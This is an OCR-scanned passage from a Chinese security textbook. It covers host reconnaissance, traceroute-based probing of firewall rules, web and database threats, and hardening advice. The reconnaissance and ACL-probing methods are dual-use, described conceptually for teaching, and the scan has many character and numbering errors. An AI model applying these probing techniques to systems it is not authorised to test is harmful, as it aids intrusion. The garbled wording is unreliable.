第 三 阶段 ， 根据 搜集 到 的 信息 判断 或 者 进一步 测试 系统 是 否 存在 安全 漏洞 。 

依据 上 述 三 个 阶段 ， 在 网 络 安全 扫描 中 涉及 的 主要 技术 包括 : 主机 侦察 、PING 扫射 、 
操作 系统 探测 、 如 何 探测 访问 控制 规则 、 端 口 扫描 、 漏 洞 扫描 等 。 这 其 中 很 多 技术 可 以 参考 
2.5.3 小 节 的 内 容 ， 本 节 重 点 讲解 “主机 侦察 ”和 “如 何 探测 访问 控制 规则 ”。 


6.4.44 主机 侦察 


用 来 发 现 目标 网 络 上 主机 信息 的 侦察 方法 有 两 种 : 被 动 侦察 和 主动 侦察 。 

被 动 侦察 : 是 从 开放 的 信息 源 中 收集 数据 。 开 放 信息 意味 着 这 些 信息 可 自由 地 从 外 部 访 
问 ， 且 查看 开放 信息 源 的 信息 是 完全 合法 的 行为 。 对 于 这 些 信 息 的 保护 ， 企 业 几 乎 做 不 了 什 
么 ， 但 如 果 企业 愿意 ， 依 旧 可 以 找到 一 些 可 用 的 、 保 护 企业 公开 信息 的 方法 。 常 见 的 开放 信 
息 源 包括 : 公司 网 站 、 电 子 数据 收集 、 分 析 和 检索 系统 档案 (适用 于 公众 上 市 公司 )、NNTIP 
USEET 新 闻 组 、 用 户 组 会 议 、 商 业 伙伴 、 垃 圾 侦察 以 及 社会 工程 。 
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主动 侦察 : 是 指使 用 技术 工具 发 现 目标 网 络 上 活动 主机 的 信息 。 因 为 被 动 侦察 方法 虽然 
很 有 效 ， 但 它 经 常 要 花费 大 量 的 时 间 ， 而 且 并 不 一 定 会 生成 最 精确 的 结果 。 这 时 攻击 者 会 使 
用 技术 工具 对 目标 主机 进行 扫描 获得 所 需 的 信息 。 然 而 ， 主 动 侦察 也 存在 缺点 ， 主 要 是 这 种 
侦察 方式 容易 被 发 觉 。 以 小 偷盗 穷 为 例 ， 一 个 是 他 在 准备 动手 的 房子 周围 转悠 (被 动 侦察 )， 
另 一 个 是 趴 在 房子 的 每 一 个 窗户 上 窥探 房间 里 有 什么 东西 (主动 侦察 )。 显 然 ， 窥 探 窗户 的 小 
偷 比 走 过 房 子 旁边 的 小 偷 更 值得 怀疑 。 总 之 , 主动 侦察 揭露 了 更 多 的 信息 , 但 也 更 容易 被 发 现 。 

主动 主机 侦察 中 常用 MEAN NSLookup/Whois/Dig lookups, SamSpade, Visual 
Route/Cheops. Pinger/WS Ping Pro ^&. [E] 6-2 是 NSLookup 的 应 用 举例 : 

kk»nslookup www-163 -com 


UnKnown 
172.16.30.61 


s-net 


om.cloudcdn.net 
c81.i805.hacdn.net 


图 6-2. NSLookup 扫描 示例 


从 图 6-2 我 们 可 以 看 出 NSLookup (name server lookup. 域名 查询 ) 是 一 个 用 于 查询 Intermet 
域名 信息 或 诊断 DNS 服务 器 问题 的 工具 。 我 们 用 它 解析 www.163.com 可 以 得 到 163 网 站 的 
IP 地 址 、 别 名 等 信息 


6.4.2 ”如 何 探 测 访问 控制 规则 


如 何 探测 访问 控制 规则 使 用 类 似 于 路 由 跟踪 的 下 数据 包 分 析 方 法 ,来 测定 一 个 特殊 的 数 
据 包 是 否 能 够 从 攻击 者 的 主机 传送 到 位 于 数据 包 过 滤 设 备 后 的 目标 主机 。 这 种 技术 能 够 用 于 
探测 网 关上 打开 或 允许 通过 的 端口 。 它 能 够 测定 带 有 各 种 控制 信息 的 数据 包 是 否 能 通过 给 定 
网 关 。 另 外 ， 通 过 这 种 技术 ， 一 个 攻击 者 能 够 探测 位 于 数据 包 过 滤 设 备 后 的 路 由 器 。 我 们 一 
起 分 析 图 6-3 所 示 的 实例 : 


防火 墙 


图 6-3 ”traceroute 探测 访问 控制 规则 


我 们 参照 图 6-3 分 析 在 UNIX 系统 中 如 何 利用 traceroute 命令 实现 访问 控制 探测 ,我 们 知 
道 traceroute( 路 由 跟踪 ) 工 作 在 IP 层 ( 网 络 层 ), 其 上 的 任何 传输 协议 (UDP、TCP 和 ICMP) 均 能 
被 使 用 。Traceroute 的 这 个 特性 使 得 其 能 利用 任何 位 于 TP 层 上 层 的 协议 。 假 如 我 们 试图 探测 
位 于 防火 墙 后 的 主机 ， 而 到 达 该 防火 墙 的 数据 包 被 ACL (访问 控制 ) 所 禁止 ， 则 该 数据 包 将 被 
丢弃 。 利 用 这 种 探测 ， 我 们 可 以 确定 该 路 由 上 的 一 台 网 关 (如 图 中 的 防火 墙 )。 我 们 可 以 更 改 
traceroute 的 跟踪 的 规则 继续 进行 探测 ， 使 其 得 到 正常 响应 。 这 样 我 们 就 可 以 得 到 两 点 结果 : 
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]) 该 防火 墙 允许 这 种 类 型 的 网 络 通信 通过 ;2) 探 测 到 位 于 该 防火 墙 后 的 一 台 主 机 。 我 们 继续 
加 以 分 析 ， 会 得 到 防火 墙 的 过 滤 规 则 所 针对 的 通信 类 型 。 


65 Web 系统 


我 们 在 2.7.3 小 节 中 介绍 了 Web 编程 安全 的 相关 知识 。 本 节 将 从 应 用 的 角度 讨论 Web 系 
统 面临 的 安全 威胁 及 防范 措施 。 


6.5.14. Web 系统 概述 


Web 是 World Wide Web 的 简称 ， 是 万 维 网 的 意思 。 它 是 由 欧洲 核 物 理 研究 中 心 开 发 ， 
目的 是 为 全 球 范围 的 科学 家 利用 互联 网 进行 通信 、 信 息 交 流 和 信息 查询 提供 便利 。Web 系统 
是 以 超 文本 标记 语言 (HTMD) 与 超 文本 传输 协议 (HTTP) 为 基础 ， 可 以 提供 面向 互联 网 服务 的 、 
一 致 的 用 户 界面 信息 浏览 系统 。 

Web 从 整体 上 可 以 分 为 服务 器 端 和 客户 端 两 部 分 。 其 中 服务 器 端 采 用 超 文本 链 路 来 链接 
信息 页 ， 链 路 信息 由 统一 资源 定位 器 (URL) 进 行 维持 ;客户 端 可 以 是 浏览 器 ， 也 可 以 是 客户 
端 程序 ， 也 就 是 我 们 常 说 的 B/S 或 者 C/S 架构 。 从 系统 角度 对 Web 系统 架构 进行 划分 ， 可 以 
分 为 三 大 部 分 ， 应 用 层 、 支 撑 技术 和 中 间 件 ， 除 此 之 外 还 有 最 底层 的 计算 机 资源 。 它 们 之 间 
的 关系 如 图 6-4 所 示 : 


图 6-4 Web 系统 基本 架构 


当 用 户 通过 浏览 器 访问 互联 网 上 的 某 个 资源 时 ， 首 选 要 在 浏览 器 上 键入 想 访问 资源 的 
URL， 或 者 通过 超 链接 方式 链接 到 指定 的 资源 ， 然 后 是 解析 URL 信息 ， 找 到 资源 的 中 地 址 
信息 ， 最 后 是 向 该 卫 地 址 所 在 的 服务 器 发 送 HTTP 请 求 。 

当 Web 服务 器 接收 到 一 个 HTTP 请 求 ， 会 返回 一 个 HITP 响应 ， 例 如 送 回 一 个 HTML 
页 面 。 为 了 处 理 一 个 请 求 ，Web 服务 器 可 以 响应 一 个 静态 页 面 或 图 片 ， 进 行 页 面 跳 转 ， 或 者 
把 动态 响应 的 内 容 委托 给 一 些 其 他 的 程序 ,例如 CGI 脚本 .JSPUavaServer Pages) 脚 本 、servlets、 
ASP(Active Server Pages) 脚 本 、 服 务 器 端 JavaScript 或 者 一 些 其 他 的 服务 器 端 技术 。 最 后 ， 这 
些 服务 器 端的 程序 将 产生 一 个 HTML 的 响应 ， 让 用 户 通过 浏览 器 进行 浏览 。 

根据 服务 器 操作 平台 的 不 同 ， 目 前 主流 的 Web 服务 器 是 IIS. Tomcat. Apache: 
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。 JIS: 是 Internet Information Services 的 简称 , 它 是 由 微软 公司 开发 ,运行 在 Windows 
系统 上 的 一 组 Web 服务 组 件 ， 包 括 : Web 服务 器 、FTP 服务 器 、NNTP 服务 器 和 
SMTP 服务 器 ， 分 别 用 于 网 页 浏览 、 文 件 传输 、 新 闻 服 务 和 邮件 发 送 等 方面 ， 提 
供 了 ISAPI(Intranet Server APD 作 为 扩展 Web 服务 器 功能 的 编程 接口 ， 还 提供 一 
个 Internet 数据 库 连接 器 ， 可 以 实现 对 数据 库 的 查询 和 更 新 。 

* Apache: 它 是 一 款 主要 运行 UNIX 系统 中 的 Web 服务 器 程序 ， 市 场 占有 份额 达到 
60%， 世 界 上 很 多 著名 的 网 站 都 是 采用 Apache 进行 搭建 。 它 的 成 功 之 处 主要 在 于 它 
的 源 代 码 开 放 、 有 一 支 开 放 的 开发 队伍 。 经 过 不 断 更 新 ， 它 现在 已 经 支持 Windows、 
Linux 系 统 。 

* Tomcat: 它 是 一 个 开放 源 代 码 、 运 行 servlet 和 JSP Web 应 用 软件 的 基于 Java 的 Web 

应 用 软件 容器 。Tomcat Server 是 根据 servlet 和 JSP 规范 进行 执行 的 ， 因 此 Tomcat 

Server 也 实行 了 Apache-Jakarta 规范 ， 且 比 绝 大 多 数 商 业 应 用 软件 服务 器 要 好 。 
随 着 Web 技术 的 不 断 发 展 , 给 我 们 的 生活 带 来 巨大 的 便利 。 我 们 可 以 足 不 出 户 就 能 完 

复杂 的 金融 交易 ;如 银行 服务 、 股 票 买卖 、 基 金 买卖 等 ， 搜 索 海 量 信息 ， 体 验 几 乎 无 限 的 数 

据 媒 体内 容 ， 如 电影 、 音 乐 、 图 像 、 电 视 等 ， 以 实时 方式 与 任何 人 进行 通信 ， 包 括 使 用 基于 

Web 的 电子 邮件 、 语 音 电 话 及 聊天 工具 等 。 


6.5.2 Web 系统 面 对 的 威胁 


Web 系统 面临 的 威胁 主要 包括 四 个 方面 : 保密 性 、 完 整 性 、 可 用 性 、 可 追求 性 。 我 们 下 
面 将 以 这 几 点 为 基础 展开 分 析 。 

保密 性 ， 是 指 网 络 信息 不 被 泄露 给 非 授 权 的 用 户 、 实 体 或 过 程 ， 即 信息 只 为 授权 用 户 使 
用 。 保 密 性 是 在 可 靠 性 和 可 用 性 的 基础 上 ， 保 障 网 络 信息 安全 的 重要 手段 。 保 密 性 一 旦 被 破 
坏 , 将 造成 信息 的 泄露 以 及 网 上 隐私 的 泄露 。 Web 中 对 信息 保密 性 的 威胁 又 可 分 为 网 络 窃听 、 
窃取 主机 数据 、 窃 取 网 络 配置 信息 以 及 窃取 用 户 连接 信息 。 

网 络 窃听 是 通过 观察 、 监 听 、 分 析 数 据 流 和 数据 流 模式 ， 窃 取 敏 感 信息 的 一 种 手段 ， 其 
方法 目前 主要 有 拱 线 监听 和 无 线 截获 两 种 。 搭 线 监听 是 将 导线 搭 到 无 人 值守 的 传输 线 上 进行 
监听 ， 只 要 所 搭载 的 监听 设备 不 影响 网 络 负载 平衡 ， 就 难以 发 现 。 通 过 解 调和 正确 的 协议 分 
析 ， 可 以 完全 掌握 通信 的 全 部 内 容 ; 无 线 截获 是 通过 高 灵敏 接收 网 络 站 点 或 网 络 连接 设备 辐 
射 的 电磁 波 ， 通 过 对 电磁 波 信号 的 分 析 ， 恢 复 源 数据 信号 ， 从 而 获得 网 络 信息 。 在 具体 实施 
过 程 中 可 能 做 不 到 全 部 恢复 ， 但 也 有 可 能 从 中 获得 极 有 价值 的 信息 。 

我 们 可 以 通过 硬件 屏蔽 和 数据 加 密 的 方式 来 保障 网 络 通信 的 安全 。 如 ， 链 路 加 密 、 路 由 
器 加 密 、 协 议 加 密 和 文档 加 密 等 。 

窃取 主机 数据 是 指 攻击 者 通过 各 种 手段 ， 获 得 服务 器 或 者 客户 端的 访问 权限 ， 侵 入 相应 
的 主机 ， 从 中 窃取 各 种 数据 。 窃 取 数据 的 目标 各 异 ， 从 数据 库 数 据 到 网 络 账号 ， 从 公司 服务 
器 上 的 报表 信息 到 用 户主 机 上 的 个 人 信息 。 

数据 窃取 的 后 果 很 严重 , 我 们 通常 采用 数据 加 密 和 Web 代理 的 方式 进行 防范 。 与 网 络 窃 
听 类 似 ， 可 以 将 主机 上 的 数据 进行 加 密 ， 这 样 就 算 信息 被 窃取 也 无 法 获得 实际 内 容 。Web 代 
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理 的 原理 是 采用 代理 网 关 的 通信 方式 ， 使 内 部 网 络 和 互联 网 不 直接 通信 。 内 部 网 络 采 用 内 部 
网 络 协议 ， 如 NETBIOS、TCP/IP; 而 连接 内 外 网 的 网 关上 运行 标准 的 TCP/IP 协议 ， 仅 用 于 
网 关 和 互联 网 之 间 的 通信 。 这 样 一 来 ， 内 部 计算 机 只 能 通过 代理 网 关 访问 互联 网 ， 并 且 在 代 
理 服务 器 上 很 容易 限定 内 部 网 络 计算 机 访问 外 界 计算 机 的 规则 。 另 外 ， 由 于 代理 服务 器 两 端 
采用 不 容 的 协议 标准 也 可 以 直接 阻止 外 界 非法 入 侵 。 例 如 ， 现 在 的 网 络 架设 中 ， 经 常 采用 防 
火 墙 作为 代理 网 关 ， 实 现 内 外 网 的 隔离 ， 增 添 访问 规则 ， 防 止 数 据 的 泄露 。 

窃取 网 络 配置 信息 是 指 攻击 者 通过 某 种 方式 窃取 主机 的 网 络 配置 信息 ， 以 便 为 发 起 攻击 
做 准备 。Web 代理 对 这 种 攻击 同样 有 一 定 的 防御 能 力 。 通 过 将 内 外 网 络 隔离 ， 使 得 攻击 者 无 
法 或 很 难 获得 关于 内 部 网 络 及 主机 的 信息 。 

窃取 用 户 连 接 信息 是 指 攻击 者 窃取 服务 器 上 保存 的 用 户 连接 信息 (例如 , 哪些 用 户 正 在 访 
问 服务 器 )， 从 而 了 解 服务 器 以 及 其 用 户 的 情况 ， 这 既是 一 种 对 机 密 性 和 隐私 的 破坏 ， 同 时 也 
为 进一步 的 攻击 (例如 ，Dos 攻击 ) 做 了 铺垫 。 要 防止 这 种 窃取 ， 就 需要 做 到 对 服务 器 上 用 户 
连接 信息 的 保护 ， 这 可 以 通过 加 密 和 各 种 访问 控制 技术 来 实现 。 

完整 性 ， 是 指 信息 在 输入 和 传输 的 过 程 中 ， 不 被 非法 授权 修改 和 破坏 ， 保 证 数据 的 一 致 
性 。 一 旦 完整 性 遭 到 破坏 ， 将 造成 数据 丢失 、 危 害 系 统 、 降 低 系 统 健壮 性 等 危害 。Web 中 对 
信息 完整 性 的 威胁 又 可 分 为 数据 自 改 、 特 洛 伊 木马 。 

数据 自 改 是 攻击 者 对 用 户主 机 上 或 网 络 传输 中 的 数据 进行 修改 、 增 加 或 删除 ， 造 成 数据 
破坏 。 自 改 后 的 数据 与 实际 不 符 ， 破 坏 了 数据 的 完整 性 。 对 于 数据 的 算 改 ， 防 护 措施 主要 包 
括 两 类 : 完整 性 校 验 和 数据 元 余 。 

完整 性 校 验 往往 可 以 通过 计算 校 验 和 来 完成 。 主 机 先 对 可 靠 的 数据 计算 其 校 验 和 并 存 ， 
在 使 用 该 数据 时 (包括 本 地 操作 、 发 送 和 接收 ) 再 对 数据 计算 一 次 校 验 和 ， 并 与 之 前 的 校 验 和 
相 比 较 。 如 果 一 致 ， 则 说 明 数 据 没 有 算 改 ， 否 则 数据 不 可 用 。 数 据 元 余 是 在 发 生 数 据 算 改 、 
破坏 之 后 ， 通 过 原先 对 数据 的 备份 ， 恢 复数 据 的 方法 。 这 要 求 额 外 的 存储 空间 ， 并 保证 元 余 
数据 的 完整 性 。 

特洛伊 木马 正如 前 面 所 讲述 的 木马 程序 一 样 ， 它 利用 操作 系统 、 网 络 、 数 据 库 等 计算 机 
组 件 的 漏洞 , 隐蔽 地 实施 入 侵 , 并 获得 系统 控制 权 。 由 于 木马 程序 涉及 系统 的 各 种 具体 技术 ， 
很 难 形成 统一 的 防御 措施 ， 但 是 通用 的 一 种 方法 就 是 安装 一 款 好 的 查 杀 软件 ， 通 过 不 断 更 新 
其 内 部 木马 库 的 代码 特征 来 防止 木马 程序 的 入 侵 。 

可 用 性 : 是 指 保证 信息 设施 的 正常 运行 ， 使 信息 能 够 按照 用 户 的 要 求 被 正常 使 用 。 信 息 
的 可 用 性 对 信息 应 用 来 说 具有 重要 的 意义 ， 即 使 信息 内 容 受 到 良好 的 防护 而 不 会 被 攻击 者 获 
取 或 破坏 ， 但 是 这 些 信息 无 法 被 用 户 正常 使 用 就 毫 无 价值 。 常 见 的 针对 可 用 性 的 攻击 方式 是 
Dos(denial-service-attack) 攻 击 ， 也 就 是 拒绝 服务 式 攻 击 。 如 果 攻 击 是 从 多 台 终 端 发 起 的 。 那 
么 这 种 Dos 攻击 就 是 分 布 式 拒绝 服务 式 攻 击 。 拒 绝 服务 式 攻击 属于 动态 攻击 ， 将 在 下 一 章 具 
体 讨论 。 

可 追究 性 ， 是 指 信息 的 接收 者 能 够 通过 有 效 的 手段 来 识别 信息 的 来 源 、 内 容 是 否 真实 。 
如 果 可 追究 性 被 破坏 ， 攻 击 者 将 能 够 伪造 信息 欺骗 用 户 或 服务 器 ， 同 时 也 能 够 伪装 成 合法 | 
户 ， 造 成 更 大 的 破坏 。Web 中 对 信息 可 追究 性 的 威胁 可 分 为 伪装 成 合法 用 户 、 数 据 伪 造 。 
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攻击 者 伪装 成 合法 用 户 欺 骗 服 务 器 ， 获 取 相 应 权限 后 ， 就 可 以 展开 一 系列 的 侵入 、 窃 取 
和 破坏 行为 。 

攻击 者 通过 伪造 数据 并 发 送 给 用 户 或 服务 器 ， 使 其 相信 并 接收 该 数据 。 

防范 对 可 追究 性 攻击 的 有 效 手 段 就 是 密码 学 。 我 们 在 第 2 章 中 介绍 的 基于 公 钥 密码 的 数 
字 签 名 和 身份 认证 技术 就 是 行 之 有 效 的 防范 措施 。 
6.5.8 Web 攻击 的 检测 与 防范 


上 一 节 中 我 们 介绍 了 Web 系统 面临 的 主要 威胁 和 一 些 防范 措施 。 本 节 中 我 们 将 从 行业 技 
术 角 度 讨论 通用 的 针对 Web 攻击 的 检测 与 防范 技术 。 

检测 Web 攻击 可 以 很 简单 ， 仅 需要 浏览 一 下 Web 服务 器 的 日 志 中 是 否 存在 数 十 次 、 甚 
至 数 百 次 的 文件 和 目录 访问 企图 。 也 可 更 进一步 ， 将 日 志文 件 与 功能 完善 的 网 络 IDS( 比 如 
Cisco ID 传感器 ) 结 合 起 来 ， 这 能 为 管理 员 提 供 更 详细 的 攻击 信息 。 

目录 遍历 是 针对 Windows IIS 4.0 和 5.0 的 一 种 常见 攻击 方法 ， 它 让 攻击 者 能 够 执行 或 访 
问 Web 服务 器 文件 夹 之 外 的 文件 。 例 如 ， 目 录 遍 历 让 攻击 者 能 够 执行 cmd.exe/c 命令 来 提取 
目录 信息 或 运行 Web 服务 器 上 任何 可 用 的 可 执行 程序 。 考 虑 一 下 基本 攻击 , 观察 日 志文 件 中 
记录 了 什么 内 容 。 常 用 的 CGI 漏洞 扫描 器 是 Whisker。 与 其 他 自动 测试 工具 一 样 ， 该 工具 通 
常 也 是 对 Web 服务 器 执行 每 一 种 可 能 的 攻击 , 从 而 触发 大 量 的 警报 和 事件 来 获取 有 关 服 务 器 
以 及 Web 软件 的 信息 。 

防止 Web 攻击 是 一 件 费时 的 任务 ， 从 操作 系统 到 网 络 架构 ,必须 对 系统 的 方方面面 都 提 
供 保护 。 下 面 是 几 个 通常 要 考虑 的 保护 领域 : 操作 系统 、 网 站 设计 和 网 络 结构 。 

1. 操作 系统 安全 防护 


Web 服务 器 的 操作 系统 选择 十 分 重要 ，Linux 和 FreeBSD 是 操作 系统 中 完成 基本 安装 后 
比较 安全 的 两 款 操 作 系统 。 然 而 ， 与 Windows 服务 器 一 样 ， 它 们 也 可 能 没有 进行 安全 配置 就 
JE Web 服务 器 。 这 样 ， 安 全 性 上 将 存在 较 大 风险 。 当 今 的 通用 操作 系统 都 有 这 样 的 问题 ， 
它们 默认 地 运行 着 大 量 服 务 和 应 用 ， 而 完美 的 Web 服务 器 系统 应 该 只 有 一 个 应 用 在 其 中 运 
行 : 即 Web 应 用 本 身 ， 如 IIS ER Apache. 

为 了 保护 操作 系统 的 安全 性 ， 应 该 完成 下 述 任务 : 

1) 修改 及 重新 命名 默认 账户 ; 

2) 使 用 较 长 的 口令 ; 

3) 撮 载 所 有 未 使 用 的 应 用 程序 ; 

4) 关闭 所 有 不 需要 的 服务 ， 关 闭 对 诸如 cmd.exe 的 程序 的 访问 ; 

5) 使 用 拥有 最 低 必 需 权 限 的 用 户 启动 Web 服务 器 ; 

6) 配置 允许 端口 ， 如 80 和 443; 

7) 安装 反 病毒 程序 (根据 需要 选择 ); 

8) 安装 基于 主机 的 IDS， 监 控 日 志文 件 ; 

9) 创建 一 种 将 日 志文 件 归档 到 其 他 位 置 (不 在 Web 服务 器 上 ) 的 机 制 ; 

10) 应 用 所 有 最 新 的 服务 包 和 更 新 ; 
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11) 将 Web 页 面 放置 在 非 标准 的 目录 或 驱动 器 上 。 
于 每 天 都 会 发 现 新 漏洞 ， 因此, 保护 操作 系统 的 安全 就 是 一 个 永 不 停 敬 的 工作 。 然 而， 
通过 研究 操作 系统 厂商 Web 站 点 公布 的 保护 操作 系统 安全 的 最 新 方法 及 途径 , 也 可 以 得 到 近 
平 完美 的 系统 安全 。 

2. 保护 网 站 设计 的 安全 性 


保护 网 站 设计 的 安全 性 是 一 个 很 难 介绍 的 题目 ， 因 为 它 包含 了 开发 人 员 无 意 中 遗 留 在 
Web 中 的 各 种 可 能 的 问题 。 这 里 介绍 的 内 容 仅 包括 用 于 创建 动态 内 容 的 部 署 技 术 的 实现 。 例 
如 ，ASP 开发 人 员 可 能 会 创建 一 个 仅 允许 输入 10 个 字符 的 Web 页 面 ， 但 他 又 没有 实现 用 户 
输入 字符 串 长 度 的 检查 ， 这 样 攻击 者 就 能 发 送 更 长 的 数据 ， 从 而 可 能 产生 意 想 不 到 的 后 果 ， 
如 摧毁 Web 服务 器 等 。 另 外 ， 当 开发 人 员 没有 检测 由 输入 生成 的 SQL 语句 时 ， 就 在 应 用 程 
序 中 留 下 了 SQL 注入 的 漏洞 , 这 样 可 能 导致 攻击 者 在 数据 库 中 添加 、 删除 、 修改 、 查看 数据 。 
这 些 问 题 及 其 他 常见 设计 缺陷 都 会 给 Web 服务 器 安全 带 来 威胁 。 为 了 减少 安全 威胁 ，Web 
设计 人 员 应 该 重视 下 述 实践 : 测试 Web 页 面 上 用 户 输入 的 有 效 性 , 测试 客户 端 返回 到 服务 器 
的 所 有 数据 的 有 效 性 以 及 加 密 Cookie 信息 。 

3. 保护 网 络 结构 的 安全 性 


应 该 把 所 有 Web 服务 器 都 放 在 由 防火 墙 保护 的 独立 安全 网 络 中 , 以 便 阻止 除 允许 流量 之 
外 的 所 有 流量 。 在 Web 服务 器 环境 中 ， 典 型 允许 的 流量 是 通过 端口 80 和 443 的 流量 。 防 火 
墙 可 以 选择 Cisco PIX Firewall 或 Cisco Adaptive Security Appliance. 

总 之 ，Web 系统 的 安全 检测 和 防范 既 要 考虑 到 其 运行 的 平台 还 要 考虑 到 与 之 相关 的 硬件 
网 络 设备 ， 综 合 各 种 因素 设计 并 架设 一 个 从 硬件 到 软件 的 全 方位 安全 架构 。 


6.6 数据库 


除了 Web 系统 是 传统 的 攻击 目标 外 ,数据库 也 是 传统 的 攻击 目标 。 因 为 信息 是 企业 和 机 
构 的 生命 线 , 现在 每 个 成 功 的 企业 都 在 使 用 数据 库 。 具备 了 以 某 种 形式 存储 业务 信息 的 能 力 ， 
就 意味 着 不 用 走 到 仓库 实际 清点 库存 就 能 够 回答 诸如 “现在 仓库 中 还 有 多 少 笔记 本 ? ”这 样 
的 问题 。 数 据 库 无 处 不 在 ， 每 当 我 们 使 用 搜索 引擎 、 咨 询 电话 号 码 、 到 超市 购物 ， 实 际 上 我 
们 都 在 间接 地 使 用 甚至 更 新 数据 库 。 用 最 简单 的 话说 ， 数 据 库 就 是 保存 数据 的 一 个 仓库 ， 它 
在 物理 上 可 以 是 一 个 或 多 个 文件 ， 但 对 用 户 来 说 ， 其 所 看 到 的 是 用 二 维 表 表 示 的 、 按 行 和 列 
组 织 的 数据 集合 。 

数据 库 实际 上 牵涉 了 两 项 : 一 个 数据 库 管理 系统 , 这 是 一 个 软件 , 它 负 责 数据 库 的 创建 、 
管理 、 操 作 等 任务 ; 另 一 个 是 存储 着 用 户 与 系统 数据 的 实际 数据 库 , 它 是 由 管理 系统 创建 的 。 
一 个 数据 库 管 理 系 统 上 往往 能 够 创建 多 个 数据 库 ， 也 能 够 管理 这 些 数据 库 。 常 用 的 数据 库 管 
理 系统 包括 Oracle, Sybase. Informix. Microsoft SQL Server. MySQL. Microsoft Access, 
Visual FoxPro. DB2 等 。 
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现在 人 们 使 用 最 多 的 数据 库 系统 都 是 关系 型 数据 库 系统 ， 它 们 采用 了 标准 的 SQL 语言 
作为 数据 操作 和 定义 语言 。 虽 然 每 一 种 数据 库 的 实现 都 存在 一 些 差异 ， 但 基本 上 都 是 对 标准 
的 扩充 。 在 实际 应 用 中 ， 并 不 需要 用 户 直接 输入 SQL 语句 来 查询 信息 ， 而 把 SQL 语句 编写 
在 应 用 程序 中 ,程序 在 运行 过 程 中 ,根据 需要 把 SQL 语句 发 送 给 数据 库 管 理 系统 ， 数 据 库 管 
理 系统 将 满足 条 件 的 数据 或 操作 结果 返回 给 应 用 程序 。 例 如 ， 当 访问 联机 销售 网 站 时 ， 在 它 
的 价格 范围 框 中 输入 或 选择 一 个 价格 范围 后 ，Web 应 用 就 会 向 数据 库 发 送 一 条 SQL 语句 , 查 
询 满足 这 个 条 件 的 商品 的 信息 。 不 同 厂商 出 品 的 数据 库 管 理 系统 在 SQL 语法 的 采用 上 存在 一 
些 不 同 ， 但 它们 基本 上 都 支持 国际 标准 ANSI SQL-92， 最 新 标准 是 ANSI SQL-2003. 
数据 库 的 设计 正 朝 着 易于 用 户 提取 数据 的 方向 发 展 ， 为 方便 应 用 ， 数 据 库 必须 提供 某 种 
形式 的 外 部 窗口 ， 让 程序 能 够 访问 数据 库 中 保存 的 数据 。 然 而 不 幸 的 是 ， 这 个 窗口 也 给 攻击 
者 留 下 了 进入 数据 库 、 提 取 数 据 库 信息 的 大 门 。 由 于 下 述 一 些 原因 ,数据 库 经 常会 受到 攻击 : 
。 数据 窃贼 一 一 攻击 数据 库 的 一 个 最 显而易见 的 原因 是 , 攻击 者 想 要 得 到 数据 库 中 包含 
的 数据 。 例 如 ， 信 用 卡 的 详细 信息 无 疑 要 保存 在 数据 库 中 ， 这 些 数据 是 攻击 者 关注 
的 重点 目标 。 另 外 ， 数 据 库 攻击 也 是 工业 间谍 的 一 件 不 可 或 缺 的 工作 。 其 他 一 些 数 
据 ， 像 对 于 竞争 对 手 来 说 的 客户 信息 ， 也 面临 着 类 似 的 风险 。 
。 数据 操纵 一 一 达到 拒绝 服务 攻击 的 途径 有 多 条 ， 其 中 包括 删除 和 修改 数据 、 删 除 用 
户 账户 ， 甚 至 完全 关闭 数据 库 服 务 器 。 
。 系统 级 利用 数据 库 也 可 以 成 为 网 络 上 其 他 系统 的 后 门 。 如 SQL Server 这 样 的 数 
据 库 都 提供 了 一 些 例 程 ， 攻 击 者 不 仅 可 以 利用 它们 攻击 和 进入 数据 库 ， 还 能 够 获取 
服务 器 的 管理 权限 ， 从 而 控制 整个 网 络 。 


6.6.1 常用 数据 库 简 介 


目前 常用 的 数据 库 都 是 关系 数据 库 ， 也 称 为 关系 数据 库 管理 系统 RDBMS)， 这 些 系统 不 
仅 提 供 了 存储 数据 的 能 力 ， 也 提供 了 管理 和 操作 数据 库 中 数据 的 工具 。 这 些 工 具 原本 是 提供 
给 数据 库 管 理 员 或 开发 人 员 使 用 的 ， 但 它们 也 是 攻击 者 攻击 工具 箱 中 不 可 或 缺 的 工具 。 了 解 
数据 库 市 场 上 的 主要 数据 库 厂商 及 其 产品 很 重要 。 理 解 网 站 或 应 用 程序 使 用 的 数据 库 类 型 及 
模式 有 助 于 快速 找到 它们 的 弱点 。 

1. Oracle 数据 库 


Oracle 数据 库 由 一 组 数据 库 管 理工 具 组 成 ， 它 们 用 于 维护 和 操作 数据 库 中 的 数据 、 定 义 
数据 库 的 结构 和 管理 数据 库 用 户 的 权限 。 第 一 个 Oracle 数据 库 产品 于 1979 年 发 布 ， 现 在 已 
经 发 展 到 Oracle Ilg. Oracle 支持 多 种 平台 ， 主 要 包括 Solaris. Linux 和 Windows. 

Oracle 数据 库 中 的 数据 ， 逻 辑 上 存储 在 表 空 间 中 ， 物 理 上 保存 在 数据 文件 中 。 表 空间 又 
进一步 划分 为 一 些 段 ， 如 数据 段 和 索引 段 ， 目 的 是 将 不 同 区 域 用 于 存储 不 同 的 内 容 ， 达 到 提 
高 效率 的 目标 。 为 了 跟踪 和 记录 数据 的 存储 情况 ，Oracle 使 用 了 一 个 称 为 系统 表 空 间 的 表 空 
间 。 这 个 表 空 间 中 存储 了 数据 字典 及 其 他 一 些 系统 信息 。 数 据 字 典 则 是 一 组 包含 了 数据 库 中 
所 有 用 户 对 象 信息 的 表 。 

Oracle 提供 的 SQL 语言 称 为 PL/SQL(Procedural Language/Structured Query Language), 它 
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在 SQL 标准 的 基础 上 增加 了 一 些 Oracle 专用 的 东西 。 用 户 可 以 在 命令 行 界面 中 使 用 SQL i8 
句 访问 数据 库 ， 也 可 以 用 如 Oracle SQL*Plus 这 样 的 图 形 用 户 界面 执行 SQL 语句 。 此 外 ， 还 
可 以 使 用 第 三 方 厂商 的 工具 操作 Oracle 数据 库 ， 如 Toad for Oracle， 这 些 工具 的 特点 是 方便 、 
快捷 。 


2. MySQL 数据 库 


MySQL 是 由 MySQL AB 发 布 和 支持 的 关系 数据 库 管理 系统 ， 它 是 开源 的 ， 深 受 编程 人 
员 的 喜爱 。 MySQL 是 一 个 流行 的 Web 应 用 数据 库 , 通常 和 PHP 结合 使 用 。 它 支持 多 种 平台 ， 
包括 Solaris, Linux 和 Windows. MySQL 的 早期 版 本 不 支持 真正 的 RDBMS 所 具备 的 很 多 标 
准 功能 ， 包 括 不 支持 事务 处 理 。 现 在 这 种 情况 已 经 被 改变 ， 从 版 本 5.0 开始 提供 了 对 存储 过 
程 和 视图 的 支持 。 

